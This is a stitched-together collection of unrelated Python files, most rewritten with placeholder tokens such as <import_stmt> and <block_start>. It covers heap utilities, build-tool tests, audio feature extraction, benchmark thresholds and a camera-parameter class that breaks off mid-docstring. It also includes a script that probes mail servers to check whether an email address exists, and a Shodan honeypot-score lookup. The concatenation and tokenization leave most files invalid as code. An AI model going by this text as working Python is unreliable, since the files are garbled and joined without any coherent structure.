    best = [(key(value), i, value) for i, value in zip(range(n), it)]
    if not best:
        return best
    _heapify_max(best)
    bound = best[0][0]
    tiebreak = n
    replace = _heapreplace_max
    for value in it:
        decorated = key(value)
        if decorated < bound:
            replace(best, (decorated, tiebreak, value))
            bound = best[0][0]
            tiebreak += 1
    best.sort()
    return [triple[2] for triple in best]


def nlargest(n, iterable, key=None):
    """Find the n largest elements in a dataset.

    Equivalent to:  sorted(iterable, key=key, reverse=True)[:n]
    """
    # A single winner degenerates to max(); sentinel marks empty input.
    if n == 1:
        it = iter(iterable)
        sentinel = object()
        if key is None:
            winner = max(it, default=sentinel)
        else:
            winner = max(it, default=sentinel, key=key)
        return [] if winner is sentinel else [winner]

    # If the input size is known and n covers all of it, sorted() is faster.
    try:
        size = len(iterable)
    except (TypeError, AttributeError):
        pass
    else:
        if n >= size:
            return sorted(iterable, key=key, reverse=True)[:n]

    it = iter(iterable)
    if key is None:
        # Mirror of nsmallest: a minheap of the n largest so far.  Orders
        # count 0, -1, -2, ... so earlier arrivals still win ties after the
        # final descending sort.
        best = [(value, i) for i, value in zip(range(0, -n, -1), it)]
        if not best:
            return best
        heapify(best)
        bound = best[0][0]
        tiebreak = -n
        replace = heapreplace
        for value in it:
            if bound < value:
                replace(best, (value, tiebreak))
                bound = best[0][0]
                tiebreak -= 1
        best.sort(reverse=True)
        return [pair[0] for pair in best]

    best = [(key(value), i, value) for i, value in zip(range(0, -n, -1), it)]
    if not best:
        return best
    heapify(best)
    bound = best[0][0]
    tiebreak = -n
    replace = heapreplace
    for value in it:
        decorated = key(value)
        if bound < decorated:
            replace(best, (decorated, tiebreak, value))
            bound = best[0][0]
            tiebreak -= 1
    best.sort(reverse=True)
    return [triple[2] for triple in best]


# Prefer the C implementations when available; each symbol is replaced
# independently so a partial _heapq still accelerates what it can.
try:
    from _heapq import *
except ImportError:
    pass
try:
    from _heapq import _heapreplace_max
except ImportError:
    pass
try:
    from _heapq import _heapify_max
except ImportError:
    pass
try:
    from _heapq import _heappop_max
except ImportError:
    pass


if __name__ == "__main__":
    import doctest
    print(doctest.testmod())
<import_stmt>re<import_stmt>smtplib<import_stmt>dns.resolver<line_sep># Address used for SMTP MAIL FROM command fromAddress='<EMAIL>'<line_sep># Simple Regex for syntax checking regex='^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,})$'<line_sep># Email address to verify inputAddress=input('Please enter the emailAddress to verify:')<line_sep>addressToVerify=str(inputAddress)<line_sep># Syntax check match=re.match(regex addressToVerify)<if_stmt>match<eq><none><block_start>print('Bad Syntax')<line_sep><raise>ValueError('Bad Syntax')<block_end># Get domain for DNS lookup splitAddress=addressToVerify.split('@')<line_sep>domain=str(splitAddress[1])<line_sep>print('Domain:' domain)<line_sep># MX record lookup records=dns.resolver.query(domain 'MX')<line_sep>mxRecord=records[0].exchange<line_sep>mxRecord=str(mxRecord)<line_sep># SMTP lib setup (use debug level for full output) server=smtplib.SMTP()<line_sep>server.set_debuglevel(0)<line_sep># SMTP Conversation server.connect(mxRecord)<line_sep>server.helo(server.local_hostname)### server.local_hostname(Get local server hostname) server.mail(fromAddress)<line_sep>code,message=server.rcpt(str(addressToVerify))<line_sep>server.quit()<line_sep>#print(code) #print(message) # Assume SMTP response 250 is success <if_stmt>code<eq>250<block_start>print('Success')<block_end><else_stmt><block_start>print('Bad')<block_end>
<import_stmt>mock<import_stmt>unittest<import_from_stmt>mock Mock<import_from_stmt>parameterized parameterized<import_from_stmt>conans.client tools<import_from_stmt>conans.client.conf.detect detect_defaults_settings<import_from_stmt>conans.paths DEFAULT_PROFILE_NAME<import_from_stmt>conans.test.utils.mocks TestBufferConanOutput<class_stmt>DetectTest(unittest.TestCase)<block_start>@mock.patch("platform.machine" return_value="")<def_stmt>test_detect_empty_arch self _<block_start>result=detect_defaults_settings(output=Mock() profile_path=DEFAULT_PROFILE_NAME)<line_sep>result=dict(result)<line_sep>self.assertTrue("arch"<not><in>result)<line_sep>self.assertTrue("arch_build"<not><in>result)<block_end>@mock.patch("conans.client.conf.detect._gcc_compiler" return_value=("gcc" "8"))<def_stmt>test_detect_custom_profile self _<block_start>output=TestBufferConanOutput()<with_stmt>tools.environment_append({"CC":"gcc"})<block_start>detect_defaults_settings(output profile_path="~/.conan/profiles/mycustomprofile")<line_sep>self.assertIn("conan profile update settings.compiler.libcxx=libstdc++11 "<concat>"mycustomprofile" output)<block_end><block_end>@mock.patch("conans.client.conf.detect._gcc_compiler" return_value=("gcc" "8"))<def_stmt>test_detect_default_profile self _<block_start>output=TestBufferConanOutput()<with_stmt>tools.environment_append({"CC":"gcc"})<block_start>detect_defaults_settings(output profile_path="~/.conan/profiles/default")<line_sep>self.assertIn("conan profile update settings.compiler.libcxx=libstdc++11 default" output)<block_end><block_end>@mock.patch("conans.client.conf.detect._gcc_compiler" return_value=("gcc" "8"))<def_stmt>test_detect_file_profile self _<block_start>output=TestBufferConanOutput()<with_stmt>tools.environment_append({"CC":"gcc"})<block_start>detect_defaults_settings(output profile_path="./MyProfile")<line_sep>self.assertIn("conan profile update settings.compiler.libcxx=libstdc++11 MyProfile" 
output)<block_end><block_end>@mock.patch("conans.client.conf.detect._gcc_compiler" return_value=("gcc" "8"))<def_stmt>test_detect_abs_file_profile self _<block_start>output=TestBufferConanOutput()<with_stmt>tools.environment_append({"CC":"gcc"})<block_start>detect_defaults_settings(output profile_path="/foo/bar/quz/custom-profile")<line_sep>self.assertIn("conan profile update settings.compiler.libcxx=libstdc++11 "<concat>"custom-profile" output)<block_end><block_end>@parameterized.expand([['powerpc' '64' '7.1.0.0' 'ppc64'] ['powerpc' '32' '7.1.0.0' 'ppc32'] ['rs6000' <none> '4.2.1.0' 'ppc32']])<def_stmt>test_detect_aix self processor bitness version expected_arch<block_start><with_stmt>mock.patch("platform.machine" mock.MagicMock(return_value='XXXXXXXXXXXX')) mock.patch("platform.processor" mock.MagicMock(return_value=processor)) mock.patch("platform.system" mock.MagicMock(return_value='AIX')) mock.patch("conans.client.tools.oss.OSInfo.get_aix_conf" mock.MagicMock(return_value=bitness)) mock.patch('subprocess.check_output' mock.MagicMock(return_value=version))<block_start>result=detect_defaults_settings(output=Mock() profile_path=DEFAULT_PROFILE_NAME)<line_sep>result=dict(result)<line_sep>self.assertEqual("AIX" result['os'])<line_sep>self.assertEqual("AIX" result['os_build'])<line_sep>self.assertEqual(expected_arch result['arch'])<line_sep>self.assertEqual(expected_arch result['arch_build'])<block_end><block_end>@parameterized.expand([['arm64' 'armv8'] ['i386' 'x86'] ['i686' 'x86'] ['i86pc' 'x86'] ['amd64' 'x86_64'] ['aarch64' 'armv8'] ['sun4v' 'sparc']])<def_stmt>test_detect_arch self machine expected_arch<block_start><with_stmt>mock.patch("platform.machine" mock.MagicMock(return_value=machine))<block_start>result=detect_defaults_settings(output=Mock() profile_path=DEFAULT_PROFILE_NAME)<line_sep>result=dict(result)<line_sep>self.assertEqual(expected_arch result['arch'])<line_sep>self.assertEqual(expected_arch 
result['arch_build'])<block_end><block_end>@mock.patch("conans.client.conf.detect._clang_compiler" return_value=("clang" "9"))<def_stmt>test_detect_clang_gcc_toolchain self _<block_start>output=TestBufferConanOutput()<with_stmt>tools.environment_append({"CC":"clang-9 --gcc-toolchain=/usr/lib/gcc/x86_64-linux-gnu/9"})<block_start>detect_defaults_settings(output profile_path="./MyProfile")<line_sep>self.assertIn("CC and CXX: clang-9 --gcc-toolchain" output)<block_end><block_end><def_stmt>test_vs2022 self<block_start><with_stmt>mock.patch("conans.client.conf.detect._get_default_compiler" mock.MagicMock(return_value=("Visual Studio" "17")))<block_start>result=detect_defaults_settings(output=Mock() profile_path=DEFAULT_PROFILE_NAME)<line_sep>result=dict(result)<line_sep>self.assertEqual('msvc' result['compiler'])<line_sep>self.assertEqual('19.3' result['compiler.version'])<block_end><block_end><block_end>
# -*- coding: utf-8 -*- # Licensed under a 3-clause BSD style license, see LICENSE. """ Module for miscellaneous and general utilities. """<import_from_stmt>.exceptions *<line_sep>
<import_stmt>os<import_stmt>sys<import_stmt>shutil<import_stmt>glob<import_stmt>time<import_stmt>multiprocessing<as>mp<if_stmt>len(sys.argv)<ne>5<block_start>print("Usage: ")<line_sep>print("python extract_features_for_merlin.py <path_to_merlin_dir> <path_to_wav_dir> <path_to_feat_dir> <sampling rate>")<line_sep>sys.exit(1)<block_end># top merlin directory merlin_dir=sys.argv[1]<line_sep># input audio directory wav_dir=sys.argv[2]<line_sep># Output features directory out_dir=sys.argv[3]<line_sep># initializations fs=int(sys.argv[4])<line_sep># tools directory straight=os.path.join(merlin_dir "tools/bin/straight")<line_sep>sptk=os.path.join(merlin_dir "tools/bin/SPTK-3.9")<line_sep>raw_dir=os.path.join(out_dir 'raw')<line_sep>sp_dir=os.path.join(out_dir 'sp')<line_sep>mgc_dir=os.path.join(out_dir 'mgc')<line_sep>bap_dir=os.path.join(out_dir 'bap')<line_sep>ap_dir=os.path.join(out_dir 'ap')<line_sep>f0_dir=os.path.join(out_dir 'f0')<line_sep>lf0_dir=os.path.join(out_dir 'lf0')<if_stmt><not>os.path.exists(out_dir)<block_start>os.mkdir(out_dir)<block_end><if_stmt><not>os.path.exists(raw_dir)<block_start>os.mkdir(raw_dir)<block_end><if_stmt><not>os.path.exists(sp_dir)<block_start>os.mkdir(sp_dir)<block_end><if_stmt><not>os.path.exists(mgc_dir)<block_start>os.mkdir(mgc_dir)<block_end><if_stmt><not>os.path.exists(bap_dir)<block_start>os.mkdir(bap_dir)<block_end><if_stmt><not>os.path.exists(ap_dir)<block_start>os.mkdir(ap_dir)<block_end><if_stmt><not>os.path.exists(f0_dir)<block_start>os.mkdir(f0_dir)<block_end><if_stmt><not>os.path.exists(lf0_dir)<block_start>os.mkdir(lf0_dir)<block_end><if_stmt>fs<eq>16000<block_start>nFFT=1024<line_sep>alpha=0.58<block_end><elif_stmt>fs<eq>48000<block_start>nFFT=4096<line_sep>alpha=0.77<block_end><else_stmt><block_start>print("As of now, we don't support %d Hz sampling rate."%(fs))<line_sep>print("Please consider either downsampling to 16000 Hz or upsampling to 48000 
Hz")<line_sep>sys.exit(1)<block_end>mcsize=59<line_sep>order=24<line_sep>nFFTHalf=1+nFFT/2<line_sep>fshift=5<def_stmt>get_wav_filelist wav_dir<block_start>wav_files=[]<for_stmt>file os.listdir(wav_dir)<block_start>whole_filepath=os.path.join(wav_dir file)<if_stmt>os.path.isfile(whole_filepath)<and>str(whole_filepath).endswith(".wav")<block_start>wav_files.append(whole_filepath)<block_end><elif_stmt>os.path.isdir(whole_filepath)<block_start>wav_files<augadd>get_wav_filelist(whole_filepath)<block_end><block_end>wav_files.sort()<line_sep><return>wav_files<block_end><def_stmt>process filename<block_start>''' The function decomposes a wav file into F0, mel-cepstral coefficients, and band aperiodicity :param filename: path to wav file :return: .lf0, .mgc and .bap files '''<line_sep>file_id=os.path.basename(filename).split(".")[0]<line_sep>print(file_id)<line_sep>sox_wav_2_raw_cmd='sox %s -b 16 -c 1 -r %s -t raw %s'%(filename fs os.path.join(raw_dir file_id+'.raw'))<line_sep>os.system(sox_wav_2_raw_cmd)<line_sep>### STRAIGHT ANALYSIS -- extract vocoder parameters ### ### extract f0, sp, ap ### straight_f0_analysis_cmd="%s -nmsg -maxf0 400 -uf0 400 -minf0 50 -lf0 50 -f0shift %s -f %s -raw %s %s"%(os.path.join(straight 'tempo') fshift fs os.path.join(raw_dir file_id+'.raw') os.path.join(f0_dir file_id+'.f0'))<line_sep>os.system(straight_f0_analysis_cmd)<line_sep>straight_ap_analysis_cmd="%s -nmsg -f %s -fftl %s -apord %s -shift %s -f0shift %s -float -f0file %s -raw %s %s"%(os.path.join(straight 'straight_bndap') fs nFFT nFFTHalf fshift fshift os.path.join(f0_dir file_id+'.f0') os.path.join(raw_dir file_id+'.raw') os.path.join(ap_dir file_id+'.ap'))<line_sep>os.system(straight_ap_analysis_cmd)<line_sep>straight_sp_analysis_cmd="%s -nmsg -f %s -fftl %s -apord %s -shift %s -f0shift %s -order %s -f0file %s -pow -float -raw %s %s"%(os.path.join(straight 'straight_mcep') fs nFFT nFFTHalf fshift fshift mcsize os.path.join(f0_dir file_id+'.f0') os.path.join(raw_dir file_id+'.raw') 
os.path.join(sp_dir file_id+'.sp'))<line_sep>os.system(straight_sp_analysis_cmd)<line_sep>### convert f0 to lf0 ### sptk_x2x_af_cmd="%s +af %s | %s > %s "%(os.path.join(sptk 'x2x') os.path.join(f0_dir file_id+'.f0') os.path.join(sptk 'sopr')+' -magic 0.0 -LN -MAGIC -1.0E+10' os.path.join(lf0_dir file_id+'.lf0'))<line_sep>os.system(sptk_x2x_af_cmd)<line_sep>### convert sp to mgc ### sptk_mcep="%s -a %s -m %s -l %s -e 1.0E-8 -j 0 -f 0.0 -q 3 %s > %s"%(os.path.join(sptk 'mcep') alpha mcsize nFFT os.path.join(sp_dir file_id+'.sp') os.path.join(mgc_dir file_id+'.mgc'))<line_sep>os.system(sptk_mcep)<line_sep>### convert ap to bap ### sptk_mcep="%s -a %s -m %s -l %s -e 1.0E-8 -j 0 -f 0.0 -q 1 %s > %s"%(os.path.join(sptk 'mcep') alpha order nFFT os.path.join(ap_dir file_id+'.ap') os.path.join(bap_dir file_id+'.bap'))<line_sep>os.system(sptk_mcep)<block_end>print("--- Feature extraction started ---")<line_sep>start_time=time.time()<line_sep># get wav files list wav_files=get_wav_filelist(wav_dir)<line_sep># do multi-processing pool=mp.Pool(mp.cpu_count())<line_sep>pool.map(process wav_files)<line_sep># clean temporal files shutil.rmtree(raw_dir ignore_errors=<true>)<line_sep>shutil.rmtree(sp_dir ignore_errors=<true>)<line_sep>shutil.rmtree(f0_dir ignore_errors=<true>)<line_sep>shutil.rmtree(ap_dir ignore_errors=<true>)<line_sep>print("You should have your features ready in: "+out_dir)<line_sep>(m s)=divmod(int(time.time()-start_time) 60)<line_sep>print(("--- Feature extraction completion time: %d min. %d sec ---"%(m s)))<line_sep>
#Developer by Bafomet # -*- coding: utf-8 -*- <import_stmt>requests<import_from_stmt>settings shodan_api<line_sep># color R="\033[31m"# Red G="\033[1;34m"# Blue C="\033[1;32m"# Green W="\033[0m"# white O="\033[45m"# Purple <def_stmt>honeypot inp<block_start>url=f"https://api.shodan.io/labs/honeyscore/{inp}"<try_stmt><block_start>result=requests.get(url params={"key":shodan_api}).text<block_end><except_stmt><block_start>print(f"\nНет доступной информации!")<line_sep><return><block_end><if_stmt>"error"<in>result<or>"404"<in>result<block_start>print("IP не найден")<line_sep><return><block_end><elif_stmt>result<block_start>probability=str(float(result)<times>10)<line_sep>print(f"{G} [ + ]{R} Вероятность что это Honeypot : {probability}%")<line_sep>print()<line_sep>print(f"{G} На Shodan проверил, там тоже пусто.")<block_end><else_stmt><block_start>print(" Что-то пошло не так ")<block_end><block_end>
"""Clean Code in Python - Chapter 9: Common Design Patterns > State """<import_stmt>abc<import_from_stmt>log logger<import_from_stmt>state_1 InvalidTransitionError<class_stmt>MergeRequestState(abc.ABC)<block_start><def_stmt>__init__ self merge_request<block_start>self._merge_request=merge_request<block_end>@abc.abstractmethod<def_stmt>open self<block_start><ellipsis><block_end>@abc.abstractmethod<def_stmt>close self<block_start><ellipsis><block_end>@abc.abstractmethod<def_stmt>merge self<block_start><ellipsis><block_end><def_stmt>__str__ self<block_start><return>self.__class__.__name__<block_end><block_end><class_stmt>Open(MergeRequestState)<block_start><def_stmt>open self<block_start>self._merge_request.approvals=0<block_end><def_stmt>close self<block_start>self._merge_request.approvals=0<line_sep>self._merge_request.state=Closed<block_end><def_stmt>merge self<block_start>logger.info("merging %s" self._merge_request)<line_sep>logger.info("deleting branch %s" self._merge_request.source_branch)<line_sep>self._merge_request.state=Merged<block_end><block_end><class_stmt>Closed(MergeRequestState)<block_start><def_stmt>open self<block_start>logger.info("reopening closed merge request %s" self._merge_request)<line_sep>self._merge_request.state=Open<block_end><def_stmt>close self<block_start>"""Current state."""<block_end><def_stmt>merge self<block_start><raise>InvalidTransitionError("can't merge a closed request")<block_end><block_end><class_stmt>Merged(MergeRequestState)<block_start><def_stmt>open self<block_start><raise>InvalidTransitionError("already merged request")<block_end><def_stmt>close self<block_start><raise>InvalidTransitionError("already merged request")<block_end><def_stmt>merge self<block_start>"""Current state."""<block_end><block_end><class_stmt>MergeRequest<block_start><def_stmt>__init__ self source_branch:str 
target_branch:str<arrow><none><block_start>self.source_branch=source_branch<line_sep>self.target_branch=target_branch<line_sep>self._state:MergeRequestState<line_sep>self.approvals=0<line_sep>self.state=Open<block_end>@property<def_stmt>state self<block_start><return>self._state<block_end>@state.setter<def_stmt>state self new_state_cls<block_start>self._state=new_state_cls(self)<block_end>@property<def_stmt>status self<block_start><return>str(self.state)<block_end><def_stmt>__getattr__ self method<block_start><return>getattr(self.state method)<block_end><def_stmt>__str__ self<block_start><return>f"{self.target_branch}:{self.source_branch}"<block_end><block_end>
# MIT licensed # Copyright (c) 2013-2020 lilydjwg <<EMAIL>>, et al. <import_stmt>pytest<line_sep>pytestmark=[pytest.mark.asyncio pytest.mark.needs_net]<async_keyword><def_stmt>test_gitlab get_version<block_start>ver=<await>get_version("example" {"source":"gitlab" "gitlab":"gitlab-org/gitlab-test" })<assert_stmt>len(ver)<eq>8<assert_stmt>ver.isdigit()<block_end><async_keyword><def_stmt>test_gitlab_blm get_version# repo with a custom main branch <block_start>ver=<await>get_version("example" {"source":"gitlab" "gitlab":"asus-linux/asusctl" })<assert_stmt>len(ver)<eq>8<assert_stmt>ver.isdigit()<block_end><async_keyword><def_stmt>test_gitlab_max_tag get_version<block_start><assert_stmt><await>get_version("example" {"source":"gitlab" "gitlab":"gitlab-org/gitlab-test" "use_max_tag":<true> })<eq>"v1.1.1"<block_end><async_keyword><def_stmt>test_gitlab_max_tag_with_include get_version<block_start><assert_stmt><await>get_version("example" {"source":"gitlab" "gitlab":"gitlab-org/gitlab-test" "use_max_tag":<true> "include_regex":r'v1\.0.*' })<eq>"v1.0.0"<block_end><async_keyword><def_stmt>test_gitlab_max_tag_with_ignored get_version<block_start><assert_stmt><await>get_version("example" {"source":"gitlab" "gitlab":"gitlab-org/gitlab-test" "use_max_tag":<true> "ignored":"v1.1.0 v1.1.1" })<eq>"v1.0.0"<block_end>
# Generated by Django 3.1 on 2020-08-05 13:09 <import_from_stmt>django.db migrations models<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('website' '0012_service') ('users' '0002_alter_user_first_name') ]<line_sep>operations=[migrations.AddField(model_name='user' name='services' field=models.ManyToManyField(to='website.Service') ) ]<block_end>
<import_from_stmt>packaging.specifiers SpecifierSet<import_from_stmt>packaging.version Version<line_sep># TensorFlow # Throughput, unit: images/second TENSORFLOW_TRAINING_CPU_SYNTHETIC_THRESHOLD={"<2.0":50 ">=2.0":50}<line_sep>TENSORFLOW_TRAINING_GPU_SYNTHETIC_THRESHOLD={"<2.0":5000 ">=2.0":7000}<line_sep>TENSORFLOW_TRAINING_GPU_IMAGENET_THRESHOLD={"<2.0":5000 ">=2.0":7000}<line_sep># p99 latency, unit: second TENSORFLOW_INFERENCE_CPU_THRESHOLD={"<2.0":{"INCEPTION":0.06 "RCNN-Resnet101-kitti":0.65 "Resnet50v2":0.35 "MNIST":0.00045 "SSDResnet50Coco":0.4 } ">=2.0,<2.4":{"INCEPTION":0.06 "RCNN-Resnet101-kitti":0.65 "Resnet50v2":0.35 "MNIST":0.00045 "SSDResnet50Coco":0.4 } # Updated thresholds for TF 2.4.1 CPU from Vanilla TF 2.4 ">=2.4":{"INCEPTION":0.11 "RCNN-Resnet101-kitti":2.1 "Resnet50v2":0.35 "MNIST":0.001 "SSDResnet50Coco":1.2 } }<line_sep>TENSORFLOW_INFERENCE_GPU_THRESHOLD={"<2.0":{"INCEPTION":0.04 "RCNN-Resnet101-kitti":0.06 "Resnet50v2":0.014 "MNIST":0.0024 "SSDResnet50Coco":0.1 } ">=2.0":{"INCEPTION":0.04 "RCNN-Resnet101-kitti":0.06 "Resnet50v2":0.014 "MNIST":0.0024 "SSDResnet50Coco":0.1 } }<line_sep># Throughput, unit: images/second TENSORFLOW_SM_TRAINING_CPU_1NODE_THRESHOLD={">=2.0":30}<line_sep>TENSORFLOW_SM_TRAINING_CPU_4NODE_THRESHOLD={">=2.0":20}<line_sep>TENSORFLOW_SM_TRAINING_GPU_1NODE_THRESHOLD={">=2.0":2500}<line_sep>TENSORFLOW_SM_TRAINING_GPU_4NODE_THRESHOLD={">=2.0":2500}<line_sep># MXNet # Throughput, unit: images/second MXNET_TRAINING_CPU_CIFAR_THRESHOLD={">=1.0":1000}<line_sep>MXNET_TRAINING_GPU_IMAGENET_THRESHOLD={">=1.0":4500}<line_sep>MXNET_INFERENCE_CPU_IMAGENET_THRESHOLD={">=1.0":100}<line_sep>MXNET_INFERENCE_GPU_IMAGENET_THRESHOLD={">=1.0":4500}<line_sep># Accuracy, unit: NA MXNET_TRAINING_GPU_IMAGENET_ACCURACY_THRESHOLD={">=1.0":0.9}<line_sep># Latency, unit: sec/epoch MXNET_TRAINING_GPU_IMAGENET_LATENCY_THRESHOLD={">=1.0":120}<line_sep># PyTorch # Throughput, unit: images/second 
PYTORCH_TRAINING_GPU_SYNTHETIC_THRESHOLD={">=1.0":2400}<line_sep># Training Time Cost, unit: second/epoch PYTORCH_TRAINING_GPU_IMAGENET_THRESHOLD={">=1.0":660}<line_sep># p99 latency, unit: millisecond PYTORCH_INFERENCE_CPU_THRESHOLD={">=1.0":{"ResNet18":0.08 "VGG13":0.45 "MobileNetV2":0.06 "GoogleNet":0.12 "DenseNet121":0.15 "InceptionV3":0.25 }}<line_sep>PYTORCH_INFERENCE_GPU_THRESHOLD={">=1.0":{"ResNet18":0.0075 "VGG13":0.004 "MobileNetV2":0.013 "GoogleNet":0.018 "DenseNet121":0.04 "InceptionV3":0.03 }}<def_stmt>get_threshold_for_image framework_version lookup_table<block_start>""" Find the correct threshold value(s) for a given framework version and a dict from which to lookup values. :param framework_version: Framework version of the image being tested :param lookup_table: The relevant dict from one of the dicts defined in this script :return: Threshold value as defined by one of the dicts in this script """<for_stmt>spec,threshold_val lookup_table.items()<block_start><if_stmt>Version(framework_version)<in>SpecifierSet(spec)<block_start><return>threshold_val<block_end><block_end><raise>KeyError(f"{framework_version} does not satisfy any version constraint available in "<concat>f"{lookup_table.keys()}")<block_end>
<import_stmt>h2o<line_sep>h2o.init()<line_sep>weather_hex=h2o.import_file("http://h2o-public-test-data.s3.amazonaws.com/smalldata/junit/weather.csv")<line_sep># Get a summary of the data weather_hex.describe()<line_sep>
<import_stmt>json<import_stmt>warnings<import_from_stmt>enum Enum<import_from_stmt>typing Any List Tuple Union<import_stmt>numpy<as>np<import_stmt>torch<import_from_stmt>mmhuman3d.core.cameras.cameras PerspectiveCameras<import_from_stmt>mmhuman3d.core.conventions.cameras.convert_convention convert_camera_matrix convert_K_3x3_to_4x4 convert_K_4x4_to_3x3 <import_from_stmt>.builder build_cameras<line_sep>_CAMERA_PARAMETER_SUPPORTED_KEYS_={'H':{'type':int } 'W':{'type':int } 'in_mat':{'type':list 'len':3 } 'rotation_mat':{'type':list 'len':3 } 'translation':{'type':list 'len':3 } 'k1':{'type':float } 'k2':{'type':float } 'k3':{'type':float } 'k4':{'type':float } 'k5':{'type':float } 'k6':{'type':float } 'p1':{'type':float } 'p2':{'type':float } }<class_stmt>_TypeValidation(Enum)<block_start>MATCH=0<line_sep>ARRAY=1<line_sep>FAIL=2<block_end><class_stmt>CameraParameter<block_start>logger=<none><line_sep>SUPPORTED_KEYS=_CAMERA_PARAMETER_SUPPORTED_KEYS_<def_stmt>__init__ self name:str='default' H:int=1080 W:int=1920<arrow><none><block_start>""" Args: name (str, optional): Name of this camera. Defaults to "default". H (int, optional): Height of a frame, in pixel. Defaults to 1080. W (int, optional): Width of a frame, in pixel. Defaults to 1920. 
"""<line_sep>self.name=name<line_sep>self.parameters_dict={}<line_sep>in_mat=__zero_mat_list__(3)<line_sep>self.parameters_dict['in_mat']=in_mat<for_stmt>distort_name __distort_coefficient_names__<block_start>self.parameters_dict[distort_name]=0.0<block_end>_,H=self.validate_item('H' H)<line_sep>self.parameters_dict['H']=H<line_sep>_,W=self.validate_item('W' W)<line_sep>self.parameters_dict['W']=W<line_sep>r_mat=__zero_mat_list__(3)<line_sep>self.parameters_dict['rotation_mat']=r_mat<line_sep>t_list=[0.0 0.0 0.0]<line_sep>self.parameters_dict['translation']=t_list<block_end><def_stmt>reset_distort self<arrow><none><block_start>"""Reset all distort coefficients to zero."""<for_stmt>distort_name __distort_coefficient_names__<block_start>self.parameters_dict[distort_name]=0.0<block_end><block_end><def_stmt>get_opencv_distort_mat self<arrow>np.ndarray<block_start>"""Get a numpy array of 8 distort coefficients, which is the distCoeffs arg of cv2.undistort. Returns: ndarray: (k_1, k_2, p_1, p_2, k_3, k_4, k_5, k_6) of 8 elements. """<line_sep>dist_coeffs=[self.get_value('k1') self.get_value('k2') self.get_value('p1') self.get_value('p2') self.get_value('k3') self.get_value('k4') self.get_value('k5') self.get_value('k6') ]<line_sep>dist_coeffs=np.array(dist_coeffs)<line_sep><return>dist_coeffs<block_end><def_stmt>set_KRT self K_mat:np.ndarray R_mat:np.ndarray T_vec:np.ndarray inverse_extrinsic:bool=<false><arrow><none><block_start>"""Set intrinsic and extrinsic of a camera. Args: K_mat (np.ndarray): In shape [3, 3]. R_mat (np.ndarray): Rotation from world to view in default. In shape [3, 3]. T_vec (np.ndarray): Translation from world to view in default. In shape [3,]. inverse_extrinsic (bool, optional): If true, R_mat and T_vec transform a point from view to world. Defaults to False. 
"""<line_sep>k_shape=K_mat.shape<assert_stmt>k_shape[0]<eq>k_shape[1]<eq>3<line_sep>r_shape=R_mat.shape<assert_stmt>r_shape[0]<eq>r_shape[1]<eq>3<assert_stmt>T_vec.ndim<eq>1<and>T_vec.shape[0]<eq>3<line_sep>self.set_mat_np('in_mat' K_mat)<if_stmt>inverse_extrinsic<block_start>R_mat=np.linalg.inv(R_mat)<line_sep>T_vec=-np.dot(R_mat T_vec).reshape((3))<block_end>self.set_mat_np('rotation_mat' R_mat)<line_sep>self.set_value('translation' T_vec.tolist())<block_end><def_stmt>get_KRT self k_dim=3<arrow>List[np.ndarray]<block_start>"""Get intrinsic and extrinsic of a camera. Args: k_dim (int, optional): Dimension of the returned mat K. Defaults to 3. Raises: ValueError: k_dim is neither 3 nor 4. Returns: List[np.ndarray]: K_mat (np.ndarray): In shape [3, 3]. R_mat (np.ndarray): Rotation from world to view in default. In shape [3, 3]. T_vec (np.ndarray): Translation from world to view in default. In shape [3,]. """<line_sep>K_3x3=self.get_mat_np('in_mat')<line_sep>R_mat=self.get_mat_np('rotation_mat')<line_sep>T_vec=np.asarray(self.get_value('translation'))<if_stmt>k_dim<eq>3<block_start><return>[K_3x3 R_mat T_vec]<block_end><elif_stmt>k_dim<eq>4<block_start>K_3x3=np.expand_dims(K_3x3 0)# shape (1, 3, 3) K_4x4=convert_K_3x3_to_4x4(K=K_3x3 is_perspective=<true>)<line_sep># shape (1, 4, 4) K_4x4=K_4x4[0 : :]<line_sep><return>[K_4x4 R_mat T_vec]<block_end><else_stmt><block_start><raise>ValueError(f'K mat cannot be converted to {k_dim}x{k_dim}')<block_end><block_end><def_stmt>set_mat_np self mat_key:str mat_numpy:np.ndarray<arrow><none><block_start>"""Set a matrix-type parameter to mat_numpy. Args: mat_key (str): Key of the target matrix. in_mat or rotation_mat. mat_numpy (ndarray): Matrix in numpy format. Raises: TypeError: mat_numpy is not an np.ndarray. 
"""<if_stmt><not>isinstance(mat_numpy np.ndarray)<block_start><raise>TypeError<block_end>self.set_mat_list(mat_key mat_numpy.tolist())<block_end><def_stmt>set_mat_list self mat_key:str mat_list:List[list]<arrow><none><block_start>"""Set a matrix-type parameter to mat_list. Args: mat_key (str): Key of the target matrix. in_mat or rotation_mat. mat_list (List[list]): Matrix in list format. """<line_sep>_,mat_list=self.validate_item(mat_key mat_list)<line_sep>self.parameters_dict[mat_key]=mat_list<block_end><def_stmt>set_value self key:str value:Any<arrow><none><block_start>"""Set a parameter to value. Args: key (str): Name of the parameter. value (object): New value of the parameter. """<line_sep>_,value=self.validate_item(key value)<line_sep>self.parameters_dict[key]=value<block_end><def_stmt>get_value self key:str<arrow>Any<block_start>"""Get a parameter by key. Args: key (str): Name of the parameter. Raises: KeyError: key not in self.parameters_dict Returns: object: Value of the parameter. """<if_stmt>key<not><in>self.parameters_dict<block_start><raise>KeyError(key)<block_end><else_stmt><block_start><return>self.parameters_dict[key]<block_end><block_end><def_stmt>get_mat_np self key:str<arrow>np.ndarray<block_start>"""Get a a matrix-type parameter by key. Args: key (str): Name of the parameter. Raises: KeyError: key not in self.parameters_dict Returns: ndarray: Value of the parameter. """<if_stmt>key<not><in>self.parameters_dict<block_start><raise>KeyError(key)<block_end><else_stmt><block_start>mat_list=self.parameters_dict[key]<line_sep>mat_np=np.array(mat_list).reshape((3 3))<line_sep><return>mat_np<block_end><block_end><def_stmt>to_string self<arrow>str<block_start>"""Convert self.to_dict() to a string. Returns: str: A dict in json string format. """<line_sep>dump_dict=self.to_dict()<line_sep>ret_str=json.dumps(dump_dict)<line_sep><return>ret_str<block_end><def_stmt>to_dict self<arrow>dict<block_start>"""Dump camera name and parameters to dict. 
